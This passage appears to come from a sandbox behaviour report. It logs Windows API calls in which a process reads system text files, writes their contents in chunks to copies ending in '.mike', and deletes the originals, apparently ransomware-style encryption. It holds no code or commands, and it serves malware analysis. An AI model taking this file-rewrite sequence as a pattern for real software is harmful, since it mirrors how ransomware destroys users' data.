lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.523] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.523] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", dwFileAttributes=0x80) returned 0 [0130.524] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0130.524] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af134 | out: lpFileInformation=0x2af134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1674ab00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1674ab00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17168880, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x196d80)) returned 1 [0130.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0130.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0130.525] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike", lpFilePart=0x0) returned 0x5d [0130.525] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike")) returned 1 [0130.529] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0130.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0130.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0130.530] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0130.531] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.531] GetFileType (hFile=0x284) returned 0x1 [0130.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0130.531] GetFileType (hFile=0x284) returned 0x1 [0130.531] CloseHandle (hObject=0x284) returned 1 [0130.531] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.531] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.531] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0130.531] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0130.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0130.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0130.532] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), fInfoLevelId=0x0, lpFileInformation=0x219b7c8 | out: lpFileInformation=0x219b7c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36)) returned 1 [0130.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0130.532] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0130.532] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), fInfoLevelId=0x0, lpFileInformation=0x219bb68 | out: lpFileInformation=0x219bb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36)) returned 1 [0130.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0130.532] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.532] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0130.532] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0130.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0130.532] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.532] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0130.533] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0130.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0130.533] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike", lpFilePart=0x0) returned 0x5f [0130.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.533] GetFileType (hFile=0x284) returned 0x1 [0130.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.533] GetFileType (hFile=0x284) returned 0x1 [0130.534] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0130.534] WriteFile (in: hFile=0x284, lpBuffer=0x219cd08*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x219cd08*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0130.535] CloseHandle (hObject=0x284) returned 1 [0130.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0130.535] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), fInfoLevelId=0x0, lpFileInformation=0x219c72c | out: lpFileInformation=0x219c72c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ff9706, ftCreationTime.dwHighDateTime=0x1ca0402, ftLastAccessTime.dwLowDateTime=0x47ff9706, ftLastAccessTime.dwHighDateTime=0x1ca0402, ftLastWriteTime.dwLowDateTime=0x782dbd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x160e36)) returned 1 [0130.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0130.535] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.535] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.535] GetFileType (hFile=0x284) returned 0x1 [0130.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.535] GetFileType (hFile=0x284) returned 0x1 [0130.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.548] GetFileType (hFile=0x284) returned 0x1 [0130.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.548] GetFileType (hFile=0x284) returned 0x1 [0130.548] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0130.548] WriteFile (in: hFile=0x284, lpBuffer=0x21a83f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21a83f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.548] CloseHandle (hObject=0x284) returned 1 [0130.548] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.549] GetFileType (hFile=0x284) returned 0x1 [0130.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.549] GetFileType (hFile=0x284) returned 0x1 [0130.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.549] GetFileType (hFile=0x284) returned 0x1 [0130.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.549] GetFileType (hFile=0x284) returned 0x1 [0130.549] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0130.550] WriteFile (in: hFile=0x284, lpBuffer=0x21b5478*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21b5478*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.550] CloseHandle (hObject=0x284) returned 1 [0130.550] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.550] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.550] GetFileType (hFile=0x284) returned 0x1 [0130.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.550] GetFileType (hFile=0x284) returned 0x1 [0130.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.551] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.551] GetFileType (hFile=0x284) returned 0x1 [0130.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.551] GetFileType (hFile=0x284) returned 0x1 [0130.551] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x5220 [0130.551] WriteFile (in: hFile=0x284, lpBuffer=0x21c24f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21c24f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.551] CloseHandle (hObject=0x284) returned 1 [0130.552] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.552] GetFileType (hFile=0x284) returned 0x1 [0130.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.552] GetFileType (hFile=0x284) returned 0x1 [0130.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.552] GetFileType (hFile=0x284) returned 0x1 [0130.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.552] GetFileType (hFile=0x284) returned 0x1 [0130.553] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x7a20 [0130.553] WriteFile (in: hFile=0x284, lpBuffer=0x21cf578*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21cf578*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.553] CloseHandle (hObject=0x284) returned 1 [0130.553] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.553] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.553] GetFileType (hFile=0x284) returned 0x1 [0130.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.553] GetFileType (hFile=0x284) returned 0x1 [0130.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.554] GetFileType (hFile=0x284) returned 0x1 [0130.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.554] GetFileType (hFile=0x284) returned 0x1 [0130.554] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xa220 [0130.554] WriteFile (in: hFile=0x284, lpBuffer=0x21dc5f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21dc5f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.554] CloseHandle (hObject=0x284) returned 1 [0130.554] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.555] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.555] GetFileType (hFile=0x284) returned 0x1 [0130.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.555] GetFileType (hFile=0x284) returned 0x1 [0130.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.555] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.555] GetFileType (hFile=0x284) returned 0x1 [0130.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.555] GetFileType (hFile=0x284) returned 0x1 [0130.555] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xca20 [0130.556] WriteFile (in: hFile=0x284, lpBuffer=0x21e9678*, 